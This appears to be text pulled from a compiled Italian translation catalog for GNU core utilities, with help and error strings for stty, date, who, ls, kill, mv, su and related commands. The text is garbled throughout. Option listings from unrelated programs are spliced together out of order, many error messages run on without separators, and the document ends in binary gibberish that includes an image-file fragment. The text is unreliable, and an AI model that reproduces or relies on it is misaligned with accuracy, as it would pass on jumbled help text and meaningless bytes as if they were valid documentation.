 * [-]tostop     ferma i processi in background che provano a scrivere
                 sul terminale
 * [-]xcase      con icanon, fa l'escape con `\' per i caratteri maiuscoli
   cooked        come brkint ignpar istrip icrnl ixon opost isig
                 icanon, i caratteri eof e eol ai loro valori predefiniti
   -cooked       come raw
   crt           come echoe echoctl echoke
   dec           come echoe echoctl echoke -ixany intr ^c erase 0177
                 kill ^u
 * [-]decctlq    come [-]ixany
   ek            caratteri di erase e kill ai loro valori predefiniti
   evenp         come parenb -parodd cs7
  ispeed N      imposta a N la velocità di input
* line N        usa la disciplina di linea N
  min N         con -icanon, imposta a N il mimimo dei caratteri per
                completare una lettura
  ospeed N      imposta a N la velocità di output
   oddp          come parenb parodd cs7
   -oddp         come -parenb cs8
   [-]parity     come [-]evenp
   pass8         come -parenb -istrip cs8
   -pass8        come parenb istrip cs7
   raw           come -ignbrk -brkint -ignpar -parmrk -inpck -istrip
                 -inlcr -igncr -icrnl  -ixon  -ixoff  -iuclc  -ixany
                 -imaxbel -opost -isig -icanon -xcase min 1 time 0
   -raw          come cooked
   stop CAR      CAR fermerà l'output
   susp CAR      CAR invierà il segnale di stop del terminale
 * swtch CAR     CAR passerà ad un diverso livello di shell
 * werase CAR    CAR cancellerà l'ultima parola digitata
  %h   come %b
  %H   ora (00..23)
  %I   ora (01..12)
  %j   giorno dell'anno (001..366)
  %k   ora ( 0..23)
  %l   ora ( 1..12)
  %m   mese (01..12)
  %M   minuto (00..59)
  + TOKEN                    interpreta TOKEN come una stringa anche se è una
                             parola chiave come `match' o un operatore come `/'

  ( ESPRESSIONE )            valore dell'ESPRESSIONE
  -T, -w, --mesg    aggiunge lo stato dei messaggi dell'utente come +, - o ?
  -u, --users       elenca gli utenti collegati
      --message     come -T
      --writable    come -T
  -f              omette l'intestazione delle colonne nel formato breve
  -w              omette il nome completo dell'utente nel formato breve
  -i              omette il nome completo e l'host remoto nel formato breve
  -q              omette il nome completo, l'host remoto e il tempo di
                  inattività nel formato breve
  -l                         usa un formato di elenco lungo
  -L, --dereference          quando mostra le informazioni su un symlink,
                               mostra le informazioni sul file a cui si
                               riferisce invece che sul link stesso
  -m                         elenca le voci separandole con virgole
  -q, --count       tutti i nomi di login e il numero di utenti connessi
  -r, --runlevel    stampa il runlevel attuale
  -s, --short       stampa solo il nome, la riga e l'orario (predefinita)
  -t, --time        stampa l'ultima modifica dell'orologio di sistema
  -q, --hide-control-chars   stampa ? al posto dei caratteri non grafici
      --show-control-chars   mostra i caratteri non grafici come sono (predef.
                     a meno che il programma sia `ls' e l'output un terminale)
  -Q, --quote-name           racchiude tra doppi apici i nomi delle voci
      --quoting-style=TIPO   usa lo stile TIPO con i nomi delle voci:
                               literal, locale, shell, shell-always, c, escape
  -s, --signal SEGNALE, -SEGNALE Nome o numero del segnale da inviare.
  -l, --list                     Elenca i nomi dei segnali.
  -t, --table                    Stampa una tabella di informazioni sui
                                 segnali.
  -u, --update                 sposta solo quando ORIGINE è più recente del
                               file di destinazione o questo è mancante
  -v, --verbose                spiega cosa sta facendo
  -x, --one-file-system        rimane su questo file system
  none, off       non fa mai backup (anche se è specificato --backup)
  numbered, t     fa backup numerati
  existing, nil   numerati se esistono backup numerati, altrimenti semplici
  simple, never   fa sempre backup semplici
blocchi di %4s   Usati Disponib. Uso%% (backup: %s) * [-]ctlecho    fa l'echo dei caratteri di controllo nella notazione `^c'
   [-]echo       fa l'echo dei caratteri in input
 * [-]echoctl    come [-]ctlecho
   [-]echoe      come [-]crterase
   [-]echok      fa l'echo di un newline dopo un carattere di kill
 * [-]echoke     come [-]crtkill
   [-]echonl     fa l'echo di un newline anche se non fa l'echo degli altri
                 caratteri
 * [-]echoprt    fa l'echo al contrario dei caratteri cancellati, tra `\' e '/'
   [-]icanon     abilita i caratteri speciali erase, kill, werase, e rprnt
   [-]iexten     abilita i caratteri speciali non POSIX
 * [-]iuclc      converte i caratteri maiuscoli in minuscoli
 * [-]ixany      permette a qualsiasi carattere di far ripartire l'output,
                 non solo al carattere di start
   [-]ixoff      abilita l'invio dei caratteri di start/stop
   [-]ixon       abilita il controllo di flusso XON/XOFF
   [-]parmrk     indica gli errori di parità (con una sequenza 255-0-carattere)
   [-]tandem     come [-]ixoff
 * [-]ocrnl      converte carriage return in newline
 * [-]ofdel      usa per il riempimento caratteri di delete invece di null
 * [-]ofill      usa caratteri di riempimento (padding) invece di
                 temporizzazioni per i ritardi
 * [-]olcuc      converte i caratteri minuscoli in maiuscoli
 * [-]onlcr      converte newline in carriage return-newline
 * [-]onlret     newline esegue un carriage return
 * [-]onocr      non stampa i carriage return nella prima colonna
   [-]opost      postprocessa l'output
 * tabN          stile del ritardo del tab orizzontale, N in [0..3]
 * tabs          come tab0
 * -tabs         come tab3
 * vtN           stile del ritardo del tab verticale, N in [0..1]
 * eol2 CAR      CAR alternativo per terminare la riga
   erase CAR     CAR cancellerà l'ultimo carattere digitato
   intr CAR      CAR invierà un signale di interrupt
   kill CAR      CAR cancellerà la riga corrente
 * lnext CAR     CAR inserirà il CARattere successivo in modo letterale
   quit CAR      CAR invierà un segnale di quit
 * rprnt CAR     CAR ridisegnerà la riga corrente
   start CAR     CAR farà ripartire l'input dopo averlo fermato
 * rows N        dice al kernel che il terminale ha N righe
 * size          stampa il numero di righe e colonne secondo il kernel
   speed         stampa la velocità del terminale
   time N      con -icanon, imposta a N decimi di secondo il timeout in lettura
 Montato su
 gruppi= fa %e %b  %Y%e %b %H:%M%s -> %s (annullamento backup)
%s e %s sono lo stesso file%s esiste ma non è una directory%s ha il tipo di file sconosciuto%s: Questo utente non esiste%s: si possono fare link simbolici relativi solo nella directory corrente%s: impossibile sovrascrivere una directory%s: impossibile riavvolgere%s: impossibile distruggere un descrittore di file append only%s: impossibile azzerare il modo non bloccante%s: entrare nella directory %s? %s: entrare nella directory protetta dalla scrittura %s? %s: errore durante il troncamento%s: errore di scrittura all'offset %s%s: aspetta un valore numerico%s: il file ha dimensioni negative%s: file troppo grande%s: non è possibile fare un hard link a una directory%s: dimensione del file non valida%s: tipo di file non valido%s: numero di passi non valido%s: process id non valido%s: segnale non valido%s: sono stati specificati segnali multipli%s: non ci sono informazioni sulle dimensioni di questo dispositivo%s: sovrascrivo %s? %s: passo %lu/%lu (%s)...%s: passo %lu/%lu (%s)...%s%s: passo %lu/%lu (%s)...%s/%s %d%%%s: rimuovere %s %s? %s: rimuovere il %s protetto dalla scrittura %s? %s: rimosso%s: rimozione%s: rinominato in %s%s: sostituire %s? %s: impossibile eseguire tutte le operazioni richieste%s: valore non completamente convertito%s:%lu: riga non valida;  manca il secondo token%s:%lu: parola chiave non riconosciuta %s',  load average: %.2f<interno>???
COMMENTOChiama la funzione link per creare un link chiamato FILE2 a un FILE1 esistente.

Chiama la funzione unlink per rimuovere il FILE indicato.

Cambia lo user id e il group id efficaci a quelli dell'UTENTE.

  -, -l, --login               rende la shell una shell di login
  -c, --command=COMANDO        passa con -c un COMANDO singolo alla shell
  -f, --fast                   passa -f alla shell (per csh o tcsh)
  -m, --preserve-environment   non reinizializza le variabili d'ambiente
  -p                           come -m
  -s, --shell=SHELL            lancia SHELL se /etc/shells lo permette
Copia SORGENTE su DESTINAZIONE, o SORGENTI multiple nella DIRECTORY.

Copia lo standard input a ogni FILE e allo standard output.

  -a, --append              accoda ai FILE specificati, non sovrascrive
  -i, --ignore-interrupts   ignora i segnali di interruzione
Crea pipe con nome (FIFO) con il NOME dato.

Crea la/le DIRECTORY, se non esistono già.

Crea il file speciale nome del TIPO dato.

Directory: USCITAEsce con lo stato determinato dall'ESPRESSIONE.

Forza la scrittura su disco dei blocchi cambiati, aggiorna il super block.

INATTIVOInatt.Nella vita reale: LINEALoginNome di login: NOMEStampa i comandi per impostare la variabile di ambiente LS_COLORS

Determina il formato dell'output:
  -b, --sh, --bourne-shell    stampa istruzioni per la Bourne shell
  -c, --csh, --c-shell        stampa istruzioni per la C shell
  -p, --print-database        stampa le impostazioni predefinite
      --help                  mostra questo aiuto ed esce
      --version               stampa le informazioni sulla versione ed esce
Stampa chi è attualmente connesso basandosi su FILE.
Se non è specificato il FILE, usa %s.
%s è comunemente usato come FILE.

Sovrascrive ripetutamente i FILE specificati in modo da rendere più difficile
recuperare i dati anche con indagini hardware molto costose.

PIDPassword:Plan:
Stampa il NOME rimuovendo tutte le componenti di directory iniziali.
Se specificato, rimuove anche il SUFFISSO finale.

Stampa NOME rimuovendo la /componente finale; se NOME non contiene un /,
stampa `.' (intendendo la directory corrente).

Stampa o modifica le caratteristiche del terminale.

  -a, --all          stampa tutte le impostazioni correnti in un formato
                       comprensibile
  -g, --save         stampa tutte le impostazioni correnti in un formato
                       leggibile da stty
  -F, --file=DEVICE  apre e usa il device specificato invece di stdin
Stampa il nome del file del terminale connesso allo standard input.

  -s, --silent, --quiet   non stampa niente, restituisce solo uno stato
                          d'uscita
Stampa il nome file completo dell'attuale directory di lavoro.

Stampa il nome dell'utente corrente.

Project: Rinomina ORIGINE in DEST o sposta ORIGINE nella DIRECTORY.
Stampa in continuazione una riga con tutte le STRINGA specificate oppure `y'.

Esegue il COMANDO con la root directory impostata a NUOVAROOT.

Manda segnali ai processi o elenca i segnali.

Imposta LC_ALL='C' per aggirare il problema.Shell: Riassume l'uso del disco di ogni FILE, ricorsivamente per le directory.

ORAUsare `%s --help' per ulteriori informazioni.
Errore di sistema sconosciutoUso: %s ESPRESSIONE
 o:  %s OPZIONE
Uso: %s FILE
  o: %s OPZIONE
Uso: %s FILE1 FILE2
  o: %s OPZIONE
Uso: %s FORMATO [ARGOMENTO]...
 o:  %s OPZIONE
Uso: %s NOME
 o:  %s OPZIONE
Uso: %s NOME [SUFFISSO]
  o: %s OPZIONE
Uso: %s [-s SEGNALE | -SEGNALE] PID...
  o: %s -l [SEGNALE]...
  o: %s -t [SEGNALE]...
Uso: %s [NOME]
  o: %s OPZIONE
Stampa l'hostname del sistema.

Uso: %s [NUMERO]...
 o:  %s OPZIONE
Uso: %s [OPZIONE]
Uso: %s [OPZIONE] [[COMANDO [ARG]...]
Uso: %s [OPZIONE]...
Uso: %s [OPZIONE]... DIRECTORY...
Uso: %s [OPZIONE]... FILE...
Uso: %s [OPZIONE]... GRUPPO FILE...
  o: %s [OPZIONE]... --reference=RFILE FILE...
Uso: %s [OPZIONE]... ULTIMO
 o:  %s [OPZIONE]... PRIMO ULTIMO
 o:  %s [OPZIONE]... PRIMO INCREMENTO ULTIMO
Uso: %s [OPZIONE]... MODO[,MODO]... FILE...
  o: %s [OPZIONE]... MODO-OTTALE FILE...
  o: %s [OPZIONE]... --reference=RFILE FILE...
Uso: %s [OPZIONE]... NOME TIPO [MAJOR MINOR]
Uso: %s [OPZIONE]... NOME...
Uso: %s [OPZIONE]... [ FILE | ARG1 ARG2 ]
Uso: %s [OPZIONE]... [+FORMATO]
 o:  %s [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
Uso: %s [OPZIONE]... [-] [NOME=VALORE]... [COMANDO [ARG]...]
Uso: %s [OPZIONE]... [-] [UTENTE [ARG]...]
Uso: %s [OPZIONE]... [FILE]...
Uso: %s [OPZIONE]... [FILE]...
Uso: %s [OPZIONE]... [NOMEUTENTE]
Uso: %s [OPZIONE]... [UTENTE]...
Uso: %s [STRINGA]...
 o:  %s OPZIONE
ATTENZIONE: struttura di directory circolare.
Questo significa quasi sicuramente che il file system è danneggiato.
INFORMA IL TUO AMMINISTRATORE DI SISTEMA.
La seguente directory è parte del ciclo:
  %s
Attenzione: QuandoDoveScritto da %s.
^[nN]^[sSyY]`un comando deve essere specificato con un aggiustamentoaccedo a %sargomento %s ambiguo per %sil backup di %s distruggerebbe l'origine; %s non copiatoil backup di %s distruggerebbe l'origine; %s non spostatotipo di backupi file speciali a blocchi non sono gestitiimpossibile accedere a %simpossibile fare il backup di %simpossibile riassumere e contemporaneamente mostrare tutte le vociimpossibile cambiare i permessi di %simpossibile cambiare la root directory a %simpossibile entrare nella directory %simpossibile fare chdir alla root directorynon è possibile combinare i segnali con -l o -timpossibile confrontare i nomi di file %s e %simpossibile convertire U+%04X nel set di caratteri localeimpossibile convertire U+%04X nel set di caratteri locale: %simpossibile copiare la directory %s dentro sè stessa, %simpossibile copiare il link simbolico ciclico %simpossibile creare la directory %simpossibile creare il fifo %simpossibile creare l'hard link %s a %simpossibile creare il link %simpossibile creare il link %s a %simpossibile creare il file normale %simpossibile creare il file speciale %simpossibile creare il link simbolico %simpossibile creare il link simbolico %s a %simpossibile determinare il dispositivo e l'inode di %simpossibile determinare l'hostnameimpossibile fare fstat di %simpossibile determinare la directory correnteimpossibile determinare il nome del sistemaimpossibile fare lseek in %simpossibile fare contermporaneamente hard link e link simboliciimpossibile creare la directory %simpossibile spostare %s in %simpossibile spostare %s in una subdirectory di sè stesso, %simpossibile spostare una directory in una non-directory: %s -> %simpossibile aprire %s per la letturaimpossibile aprire la directory %simpossibile sovrascrivere la directory %s con una non-directoryimpossibile sovrascrivere la non-directory %s con la directory %simpossibile stampare solo i nomi o gli ID reali nel formato predefinitoimpossibile leggere le informazioni del file system per %simpossibile leggere l'orologio realtimeimpossibile leggere il link simbolico %simpossibile rimuovere %simpossibile impostare la dataimpossibile impostare il group idimpossibile impostare i gruppiimpossibile impostare l'hostname; questo sistema non ha questa funzionalitàimpossibile impostare l'orario di %simpossibile impostare lo user idimpossibile specificare l'orario da più di una fonteimpossibile fare stat di %simpossibile annullare il backup di %simpossibile scollegare %sil gruppo di %s è stato cambiato in %s
il proprietario di %s è stato cambiato in %s
il gruppo di %s è stato cambiatoproprietario di %s è stato cambiatoripristino dei permessi di %scarattere fuori dall'intervalloi file speciali a caratteri non sono gestiticambio orariochiusura di %schiusura del file di input %schiusura del file di output %simpossibile determinare l'ora di avviodirectory %s creatacreazione della directory %sdirectorydivisione per zeroexit=impossibile cambiare il gruppo di %s in %s
impossibile cambiare il modo di %s in %04lo (%s)
impossibile cambiare il proprietario di %s in %s
impossibile leggere gli attributi di %simpossibile preservare l'autore di di %simpossibile preservare il proprietario di %simpossibile preservare i permessi di %simpossibile preservare l'orario di %sfifoil tipo di file system %s è stato sia selezionato che esclusola chiamata di sistema fork è fallitala stringa di formato non può essere specificata quando si stampano stringhe
a ugual larghezzagetpass: impossibile aprire /dev/ttylettura dei nuovi attributi di %sil gruppo di %s è rimasto %s
la funzione iconv non è disponibilela funzione iconv non è utilizzabileid=ignorata la larghezza di tabulazione non valida nella variabile di
ambiente TABSIZE: %signoro il valore non valido della variabile di ambiente QUOTING_STYLE: %signorata la larghezza non valida nella variabile di ambiente COLUMNS: %sgli argomenti che non sono opzioni sono stati ignoratipassword sbagliataspostamento tra dispositivi fallito: %s in %s; impossibile rimuovere
la destinazioneargomento %s non valido per %sformato di orario %s non validodispositivo %s %s non validoargomento in virgola mobile non valido: %sgruppo non validogruppo %s non validolarghezza delle righe non valida: %smajor number del dispositivo %s non validoprofondità massima %s non validaminor number del dispositivo %s non validomodo non validomodo %s non validonumero %s non validoopzione non valida -- %cdimensioni di tabulazione non valide: %sformato dello stile di orario %s non validonome del set di caratteri universale \\%c%0*x non validoutente non validoutente %s non validolast=memoria esauritacoda di messaggimanca il numero esadecimale nella sequenza di escapeil modo di %s è diventato %04lo (%s)
il modo di %s è rimasto %04lo (%s)
sono state specificate opzioni -l o -t multiplené il link simbolico %s né il file di riferimento sono cambiati
manca la variabile di ambiente SHELL e non è stata usata l'opzione per
selezionare il tipo della shellnon è stato indicato il nome di un utente; quando si usa -l bisogna indicarne
almeno unoargomenti non numericinon è un ttydirectory %s omessapuò essere specificato un solo dispositivoapertura di %sil proprietario di %s è rimasto %s
preservato l'orario di %serrore di letturalettura di %s%s rimosso
directory rimossa: %s
rimuovere la directory `%s'? run-levelsemaforoimpostazione dei permessi di %simpostazione dell'orario di %soggetto di memoria condivisasalto il file %s perché è stato rimpiazzato mentre veniva copiatosocketstandard inputstandard outputconfronto delle stringhe fallitolink simbolicoerrore di sintassiterm=le opzioni per gli stili dell'output "comprensibile" e "leggibile da
stty" sono mutuamente esclusivele opzioni per stampare il database interno di dircolors e per selezionare
una sintassi di shell sono mutuamente esclusivele opzioni per stampare e impostare l'orario non possono essere usate insiemele opzioni per specificare la stampa di date sono mutualmente esclusivel'opzione strip non può essere usata per installare una directorytotaleoperatore binario sconosciutovalore non interpretabile nella variabile di ambiente LS_COLORSprefisso non riconosciuto: %sl'utente %s non esisteuso la shell ristretta %sattenzione: %s: i caratteri che seguono la costante carattere sono stati
ignoratiattenzione: impossibile cambiare la directory a %sattenzione: il file di origine %s è stato specificato più di una voltaattenzione: --summarize è lo stesso che usare --max-depth=0warning: working around lseek kernel bug for file (%s)
  of mt_type=0x%0lx -- see <sys/mtio.h> for the list of typesfile stranoquando si specifica uno stile dell'output, non si possono impostare i modiimpossibile creare l'hard link %s alla directory %sil %1$s appena creato non sarà sovrascritto da %2$serrore di scritturascrittura di %sscrittura di %s
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`